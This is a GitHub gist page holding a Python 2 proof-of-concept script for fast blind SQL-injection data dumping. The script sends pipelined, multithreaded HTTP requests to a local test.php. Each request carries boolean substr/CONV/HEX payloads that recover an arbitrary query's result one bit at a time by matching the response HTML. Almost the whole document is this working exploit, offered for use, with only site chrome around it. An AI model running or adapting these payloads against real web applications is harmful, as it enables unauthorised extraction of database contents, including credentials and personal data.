Created
April 20, 2016 20:20
-
-
Save cyberpunkych/1f345413c9205c07ed5dc34f3ceb4fb8 to your computer and use it in GitHub Desktop.
PoC for fast Blind SQL-Injection dumping
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket, time, re, sys | |
from multiprocessing.dummy import Pool as ThreadPool | |
bad_answ = """<table> | |
</table>""" | |
good_answ = """<table> | |
<tr> | |
<td></td> | |
<td></td> | |
<td></td> | |
</tr> | |
</table>""" | |
s_time = time.time() | |
timeout = float(sys.argv[3]) # Set timeout for correct keep-alive | |
pool = ThreadPool(int(sys.argv[2])) # Count threads | |
print "Threads count - "+sys.argv[2] | |
print "Timeout for keep-alive - "+sys.argv[3] | |
def request(len, query): | |
num = "" | |
req = "" | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect(("127.0.0.1", 80)) | |
for pg_n in range(1,9): | |
req += "GET /test.php?a=1+and+substr(REVERSE(CONV(HEX(substr(" | |
req += query+",+"+str(len)+",1)),+16,+2)),+"+str(pg_n)+",+1)=1+--+ HTTP/1.1\r\n" | |
req += "Host: 127.0.0.1\r\nConnection: keep-alive\r\n\r\n" | |
req += "HEAD /test.php HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n" | |
s.send(req) | |
time.sleep(timeout) | |
res = s.recv(640000000) | |
for i in res.split("\r\n\r\n"): | |
if good_answ in i.split("HTTP/1.")[0]: | |
num+="1" | |
elif bad_answ in i.split("HTTP/1.")[0]: | |
num+="0" | |
return chr(int(num[::-1], 2)) | |
s.close() | |
def request_len(inj): | |
reslt = "" | |
for i in range(1,5): | |
reslt+=request(i, "length("+inj+")") | |
print "\nLength is "+reslt.split('\0')[0] | |
return reslt.split('\0')[0] | |
def make_request(inj): | |
str_len = request_len(inj) | |
reslt = "" | |
# for i in range(1,int(str_len)+1): | |
# print reslt | |
# reslt+=request(i, inj) | |
reslt = pool.map(lambda x: request(x, inj), range(1,int(str_len)+1)) | |
return ''.join(reslt) | |
try: | |
print("\nResult - %s" % make_request("("+sys.argv[1]+")")) | |
except: | |
pass | |
print("\nTime: %sms" % (time.time() - s_time)) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment